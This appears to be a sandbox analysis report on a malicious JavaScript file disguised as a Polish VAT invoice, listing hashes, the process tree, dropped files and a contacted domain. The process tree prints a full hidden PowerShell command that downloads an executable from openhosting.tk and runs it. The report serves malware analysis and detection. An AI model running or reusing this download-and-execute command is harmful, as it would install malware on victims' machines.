File name: | Faktura_VAT_08e01c67db75798a021aa3e8565d35ce6.js |
Full analysis: | https://app.any.run/tasks/1993ba80-6be4-4279-8ca7-49deb89a5aa7 |
Verdict: | Malicious activity |
Analysis date: | January 22, 2019, 13:15:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | AB2971F6A56D8E406D3AAE5B54F890E4 |
SHA1: | F1619C1BA2332B388F767A998560DE49BE9307F2 |
SHA256: | C5532F6B42F02FEC05C961995676FA97862DB2098113F33901F9F5E24F7BD45F |
SSDEEP: | 384:iZcxlpASmFZTrdScZqY1EsMaY1ONAyh9LqWHcxOlhx:iZWItf9cxOjx |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2948 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Faktura_VAT_08e01c67db75798a021aa3e8565d35ce6.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
4020 | "C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('https://openhosting.tk/line6498.php','%Temp%RgX78.eXe'); & StARt %tEmp%RgX78.exe | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2680 | powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('https://openhosting.tk/line6498.php','C:\Users\admin\AppData\Local\TempRgX78.eXe'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2680 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EVXX9KI3DPK56DUA5YQS.temp | — | |
MD5:— | SHA256:— | |||
2680 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2680 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF246c18.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
Domain | IP | Reputation |
---|---|---|
openhosting.tk |
| suspicious |